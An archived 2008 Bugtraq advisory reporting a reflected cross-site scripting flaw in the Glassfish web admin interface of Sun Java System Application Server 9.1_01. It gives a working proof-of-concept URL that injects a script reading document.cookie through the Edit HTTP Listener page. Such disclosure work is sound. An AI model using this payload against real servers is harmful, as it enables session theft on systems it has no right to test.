lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 10 Jun 2008 15:12:08 -0300
From: "Eduardo Jorge" <serrano.neves@...il.com>
To: bugtraq@...urityfocus.com
Subject: XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

==============================

XSS - Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.

This is a vulnerable URL:

http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config

-- 
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds

Powered by blists - more mailing lists